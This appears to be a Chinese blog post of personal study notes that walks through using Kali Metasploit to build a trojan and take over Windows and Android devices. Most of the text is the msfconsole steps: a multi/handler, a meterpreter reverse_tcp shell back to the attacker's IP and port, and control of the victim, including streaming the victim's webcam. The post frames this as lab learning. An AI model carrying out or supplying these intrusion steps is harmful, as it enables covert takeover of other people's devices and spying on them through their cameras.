kali metasploit 木馬入侵windows和Android
阿新 • • 發佈:2018-12-11
windows :根據自己的kali IP 生成木馬
注意shell > shell.exe之間是有空格的,LHOST是kali 本機的IP ,LPORT是自定義設定的埠,據說高階口比較好過防火牆,(但是我實驗的時候感覺差不多,基於win10 的實驗,防火牆需要全關了,不然木馬檔案根本過不去)
生成木馬後的檔案在本機的主目錄下。
生成木馬後,要把木馬拖到要攻擊的目標主機下
開啟metasploit,進行攻擊
開啟metasploit :msfconsole
呼叫模組:use exploit/multi/handler
呼叫payload :set windows/meterpreter/reverse_tcp
顯示選項;show options
引數設定:set LHOST (KALI本機的的IP)
set LPORT (埠設定與前面的木馬埠要一致)
確認設定是否設定成功:show options
執行:exploit(進行等待,只要目標主機打開了木馬檔案,便能掃描到,測試的要人工去打開了,在android上的則要進行安裝)
結果:
這裡顯示有一臺機器正在執行本機的木馬,說明已經拿到了控制權,可以使用help檢視命令。
開啟機器的網路攝像頭:webcam_stream
ctrl + C 退出當前操作
exit 退出程式
Android 入侵:
步驟跟入侵windows是一樣的,就只是有一些命令要改成android,如木馬生成的命令中的windows 要改成android,shell > shell.exe要改成 apk > apk.apk .呼叫payload中的windows也是改成android。
個人感覺android入侵要比windows要簡單。
個人學習筆記。